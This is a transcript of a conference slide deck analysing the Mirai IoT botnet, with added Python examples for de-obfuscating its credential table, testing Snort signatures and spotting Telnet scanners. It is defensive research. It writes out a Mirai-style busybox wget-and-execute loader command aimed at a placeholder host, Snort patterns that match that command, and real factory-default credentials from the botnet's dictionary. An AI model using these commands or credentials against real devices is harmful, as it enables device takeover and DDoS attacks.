Look Into The Future - Analyzing Mirai botnet - Mauritius 2016 - - PowerPoint PPT Presentation



SLIDE 1

Look Into The Future
- Analyzing Mirai botnet -

Mauritius 2016 FIRST TC
Minoru Kobayashi, Internet Initiative Japan Inc.

SLIDE 2

Who am I?

  • Minoru Kobayashi
  • I work for Internet Initiative Japan Inc. (IIJ).
  • IIJ is a Japanese ISP (we are the first commercial ISP in Japan).
  • CISSP
  • I am a member of the CSIRT called "IIJ-SECT".
  • We are incident responders for our customers and our company.
  • Our jobs include:
    • Malware analysis
    • Forensic investigation
    • Incident response and handling
    • Developing and operating honeypot and web crawler systems
    • Surveying malware and attack technique trends
    • Hands-on trainer, speaker (including Black Hat, FIRST, internal lectures for the Japanese government, and so on)
    • Writing reports for our quarterly report (called "IIR") and blogs

SLIDE 3

What is the Mirai Botnet?

  • A Distributed Denial of Service (DDoS) system.
  • It infects IoT devices via Telnet (23/tcp).
  • IoT device = network camera, digital video recorder (DVR), router, and so on.
  • It uses a dictionary attack (factory default passwords).
  • Mirai was used to attack "Krebs on Security" and "OVH" in late September.
    • Krebs on Security: 620 Gbps
    • OVH: over 1 Tbps
  • "Anna-senpai" suddenly released the Mirai source code in early October.
  • Anna-senpai is the author of Mirai.

SLIDE 4

What does "Mirai" mean?

  • In Japanese, Mirai can be written as "未来". These Kanji characters are pronounced "Mirai".
  • "未来" means "the future" in English. So I gave this presentation the title "Looking Into The Future".

SLIDE 5

BTW, who is Anna-senpai?

  • The source code release announcement was posted on the hacking community "Hackforums".
  • He (she?) used a Japanese animation character as his avatar, and his handle name is "Anna-senpai".
  • I don't know that name. Let's google.

Who is she?

SLIDE 6

Anna-senpai is ...

  • Anna-senpai is the name of a Japanese animation character. The story of this animation is a fictional future.
  • Anna-senpai (the author of Mirai) may be an animation otaku. So, I think that is why Anna-senpai called this malware Mirai.
    • Otaku is Japanese slang, a synonym for a geek.
  • One more interesting thing: the source code of Mirai contains some Russian strings. Therefore Anna-senpai or his/her related parties could be Russian-speaking people.

SLIDE 7

Mirai is Open Source now.

SLIDE 8

Dive to source code

SLIDE 9

Mirai Botnet System Architecture

Components in the diagram: C&C, DB, Scan Receiver, Loader, HTTP/TFTP Server, IoT (Bot), IoT (Victim), Victim Server, Admin/User.

  ① Register Bot (IoT (Bot) -> C&C)
  ② Scan random IP addresses and attempt to login (IoT (Bot) -> IoT (Victim))
  ③ Report the IP address and credential (IoT (Bot) -> Scan Receiver)
  ④ Pass credentials (Scan Receiver -> Loader)
  ⑤ Send commands to download Bot binary (Loader -> IoT (Victim), over Telnet)
  ⑥ Request to download Bot binary (IoT (Victim) -> HTTP/TFTP Server)
  ⑦ Execute Bot binary (IoT (Victim) becomes IoT (Bot))
  ⑧ Use Mirai via CLI/API (Admin/User -> C&C)
  ⑨ DDoS Attack (IoT (Bot) -> Victim Server)

SLIDE 10

Attack command list

  Attack ID  Command   Description
  0          udp       UDP flood
  1          vse       Valve Source Engine specific flood
  2          dns       DNS resolver flood using the target's domain; the input IP is ignored
  3          syn       SYN flood
  4          ack       ACK flood
  5          stomp     TCP STOMP flood
  6          greip     GRE IP flood
  7          greeth    GRE Ethernet flood
  8          (none)    Proxy knockback connection
  9          udpplain  UDP flood with fewer options, optimized for higher PPS
  10         http      HTTP flood

Attack ID 8 is assigned, but not implemented.

SLIDE 11

Dive into the source code again

  • The credentials for IoT devices are hardcoded and obfuscated.
  • You can see this list in mirai/bot/scanner.c.
  • Mirai has 61 kinds of credentials.
  • To de-obfuscate them, XOR each byte with 0x22.
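
The following is an added example, not code from the slides or from the Mirai source: it parses add_auth_entry() lines in the shape used by mirai/bot/scanner.c and de-obfuscates them. scanner.c XORs every byte with 0xDE, 0xAD, 0xBE and 0xEF in turn, which collapses to the single XOR with 0x22 mentioned above. The sample input is constructed; the three plaintext pairs are in the leaked list, but the weights are illustrative, not the real ones.

```python
import re

# Added example (not from the slides or the Mirai source): extract and de-obfuscate
# the hard-coded credential table from scanner.c-style add_auth_entry() lines.
# scanner.c XORs each byte with 0xDE, 0xAD, 0xBE, 0xEF in turn, i.e. one XOR with 0x22.
XOR_KEY = 0xDE ^ 0xAD ^ 0xBE ^ 0xEF   # == 0x22

# Constructed sample in the shape of the add_auth_entry() calls in mirai/bot/scanner.c.
# The plaintext pairs (root/xc3511, admin/admin, root/<empty>) are in the leaked list;
# the weights here are illustrative, not the real ones.
SAMPLE_SCANNER_C = r'''
    add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10); // root xc3511
    add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x43\x46\x4F\x4B\x4C", 9);   // admin admin
    add_auth_entry("\x50\x4D\x4D\x56", "", 1);                            // root (none)
'''

ENTRY_RE = re.compile(
    r'add_auth_entry\(\s*"((?:\\x[0-9A-Fa-f]{2})*)"\s*,\s*"((?:\\x[0-9A-Fa-f]{2})*)"\s*,\s*(\d+)\s*\)'
)

def c_escapes_to_bytes(literal: str) -> bytes:
    """Turn a C string literal body made of \\xNN escapes into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9A-Fa-f]{2})', literal))

def deobf(data: bytes) -> bytes:
    """Undo the scanner.c obfuscation; XOR is its own inverse."""
    return bytes(b ^ XOR_KEY for b in data)

def extract_credentials(source: str):
    """Return [(username, password, weight), ...] in plaintext, in source order."""
    return [
        (deobf(c_escapes_to_bytes(u)).decode("ascii"),
         deobf(c_escapes_to_bytes(p)).decode("ascii"),
         int(w))
        for u, p, w in ENTRY_RE.findall(source)
    ]

if __name__ == "__main__":
    for user, password, weight in extract_credentials(SAMPLE_SCANNER_C):
        print(f"{user}:{password or '(none)'}  weight={weight}")
```

Running extract_credentials() over the real scanner.c instead of the constructed sample gives you the full dictionary the scanner tries, which is the list worth checking your own devices' defaults against.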

SLIDE 12

Can I detect it?

  • The answer is ... YES!!
  • None of the Mirai communications are encrypted, so you can write IDS/IPS signatures easily.
  • You can see it like below:

This traffic is part of process ⑤. You can see the "/bin/busybox wget" command.

SLIDE 13

Snort Signatures

  • Snort is one of the most popular open source IDS/IPS.
  • You can write signatures to detect Mirai like below:
  • Register Bot (Process ①)

    alert tcp any any -> any 23 (msg:"Mirai Botnet: Register Bot with C&C"; flow:to_server,established; content:"|00 00 00 01|"; depth:4; sid:1000000; rev:1;)

  • Send a command to download Bot (Process ⑤)

    alert tcp any any -> any [23,2323] (msg:"Mirai Botnet: Download Bot binary via Telnet (wget)"; flow:to_server,established; content:"/bin/busybox wget http://"; content:"/bins/mirai."; content:"-O - > dvrHelper|3b| /bin/busybox chmod 777 dvrHelper|3b| /bin/busybox ECCHI"; sid:1000070; rev:1;)

But attackers can easily modify these indicators of attack, so these signatures may not detect new versions or variants of Mirai. Be careful. All the Snort signatures I wrote will be published in the next issue of our quarterly report IIR (Vol.33).
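
The following is an added example, not code from the slides or from Snort: it re-implements the content checks of the two rules above in Python and runs them over constructed Telnet payloads, so the match logic and its blind spot can be seen without a Snort install. Snort content: options without distance/within are independent substring searches, which is how they are modelled here. The register message's id-length byte and id, the 192.0.2.10 host and the "variant" payload are assumptions made for the sample.

```python
# Added example (not from the slides or Snort): the content checks of the two
# Snort rules above, applied to constructed to-server Telnet payloads.

REGISTER_MAGIC = b"\x00\x00\x00\x01"        # rule 1: content:"|00 00 00 01|"; depth:4;
RULE2_CONTENTS = (                          # rule 2: three independent content: matches
    b"/bin/busybox wget http://",
    b"/bins/mirai.",
    b"-O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
)

def match_register_bot(dst_port, payload):
    """Rule 1: to-server traffic to 23/tcp whose first four bytes are 00 00 00 01."""
    return dst_port == 23 and payload[:4] == REGISTER_MAGIC

def match_download_bot(dst_port, payload):
    """Rule 2: to-server traffic to 23 or 2323 containing all three loader strings."""
    return dst_port in (23, 2323) and all(c in payload for c in RULE2_CONTENTS)

RULES = (
    ("Mirai Botnet: Register Bot with C&C", match_register_bot),
    ("Mirai Botnet: Download Bot binary via Telnet (wget)", match_download_bot),
)

# Constructed to-server payloads (not captured traffic). The register message is
# the 4-byte marker followed by an assumed 1-byte id length and id; the loader
# line follows the command format quoted in rule 2, with a documentation-range IP.
SAMPLE_FLOWS = [
    ("bot->c2", 23, b"\x00\x00\x00\x01\x04demo"),
    ("loader->victim", 23,
     b"/bin/busybox wget http://192.0.2.10:80/bins/mirai.arm7 -O - > dvrHelper; "
     b"/bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI\r\n"),
    ("admin login", 23, b"admin\r\n"),
    # assumed variant that renamed its paths: rule 2 misses it, as the slide warns
    ("variant loader", 2323,
     b"/bin/busybox wget http://192.0.2.10/x/a.arm7 -O - > .t; "
     b"/bin/busybox chmod 777 .t; /bin/busybox ECCHI\r\n"),
]

def alerts(flows):
    """Return [(flow name, rule msg), ...] for every flow/rule pair that fires."""
    return [(name, msg) for name, dport, payload in flows
            for msg, check in RULES if check(dport, payload)]

if __name__ == "__main__":
    for name, msg in alerts(SAMPLE_FLOWS):
        print(f"{name}: {msg}")
```

Only the first two flows fire. Rule 1 keys on just four bytes at the start of a stream to 23/tcp, so it is a thin indicator on its own; depth:4 keeps it from matching those bytes later in a session. Rule 2 is precise but brittle: the renamed paths in the last flow defeat it, which is the caveat stated above.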

SLIDE 14

Demo 1 Using Mirai

SLIDE 15

Demo 1 environment

Same architecture as slide 9 (C&C, DB, Scan Receiver, Loader, HTTP/TFTP Server, IoT (Bot), IoT (Victim), Victim Server, Admin/User):

  ① Register Bot
  ② Scan random IP addresses and attempt to login
  ③ Report the successful IP address and credential
  ④ Transfer credentials
  ⑤ Send commands to download Bot binary
  ⑥ Request to download Bot binary
  ⑦ Run Bot binary
  ⑧ Use Mirai via CLI/API
  ⑨ DDoS Attack

Hosts in the demo network: 192.168.153.10, 192.168.153.20, 192.168.153.100

SLIDE 16

Demo 2 Detect Mirai by Snort

SLIDE 17

How can you check whether your IoT device is infected?

  • 1. Check the number of accesses to 23/tcp and 2323/tcp.
    • The Mirai bot scans 23/tcp almost all the time, but once in 10 times it scans 2323/tcp.
    • It always scans random IPs. Therefore the number of accesses to these ports rises abruptly.
  • 2. Check that you can still reach the management port.
    • You may not be able to reach the management ports on the IoT device (e.g. Telnet, SSH, WebUI, etc.).
    • Mirai kills the management processes on the IoT device.
    • I believe this is to protect it from other IoT bot malware and to get high performance for DDoS.
  • 3. Of course, you can also use Snort.
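
The following is an added example, not code from the slides: it applies check 1 above to a connection log, flagging any source that hits many distinct hosts on 23/tcp or 2323/tcp and reporting what share of those attempts went to 2323/tcp. The log is constructed; the host addresses, the 30-attempt volume and the threshold of 20 distinct destinations are assumptions for the sample.

```python
from collections import defaultdict

# Added example (not from the slides): flag a Mirai-style Telnet scanner from a
# connection log using the two traits on the slide: many random destination IPs
# on 23/tcp, with roughly one attempt in ten going to 2323/tcp instead.

def suspected_scanners(records, min_distinct_dsts=20):
    """records: iterable of (src_ip, dst_ip, dst_port).
    Returns [(src_ip, distinct_dsts, share_of_2323), ...] sorted by src_ip for
    sources that reached at least min_distinct_dsts distinct hosts on 23 or 2323."""
    stats = defaultdict(lambda: {"dsts": set(), "n23": 0, "n2323": 0})
    for src, dst, dport in records:
        if dport not in (23, 2323):
            continue                      # other ports are not part of this check
        s = stats[src]
        s["dsts"].add(dst)
        s["n23" if dport == 23 else "n2323"] += 1
    hits = []
    for src, s in stats.items():
        if len(s["dsts"]) >= min_distinct_dsts:
            total = s["n23"] + s["n2323"]
            hits.append((src, len(s["dsts"]), round(s["n2323"] / total, 2)))
    return sorted(hits)

# Constructed connection log (not real traffic). 192.168.153.20 behaves like a bot:
# 30 attempts to 30 different addresses, every 10th one on 2323/tcp, mirroring the
# slide's "once in 10 times". The other sources are ordinary traffic.
SAMPLE_LOG = (
    [("192.168.153.20", f"198.51.100.{i}", 2323 if i % 10 == 0 else 23) for i in range(30)]
    + [("192.168.153.10", "192.168.153.100", 23), ("192.168.153.10", "192.168.153.100", 23)]
    + [("192.168.153.30", f"203.0.113.{i}", 80) for i in range(25)]
)

if __name__ == "__main__":
    for src, n_dsts, share in suspected_scanners(SAMPLE_LOG):
        print(f"{src}: {n_dsts} distinct Telnet targets, {share:.0%} of attempts on 2323/tcp")
```

Only 192.168.153.20 is reported (30 distinct targets, 10% on 2323/tcp). The admin host that logs into one device twice stays below the threshold, and the host talking to 25 web servers is ignored because only ports 23 and 2323 are counted. Pick the threshold from your own baseline; the 2323/tcp share near one in ten is the corroborating detail from the slide, not a requirement for the alert.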

SLIDE 18

Conclusion

  • Check immediately whether your IoT device is infected.
  • To remove Mirai, just reboot it (it does not persist across reboots). It's easy.
  • Change the login password of the IoT device.
    • Attackers already know the default password, because it is placed in the online manual.
  • Don't connect IoT devices directly to the Internet.
    • If you need access from the Internet, you have to set up an access control list.
    • If possible, you have to use encrypted management protocols such as SSH/HTTPS.

SLIDE 19

Thank you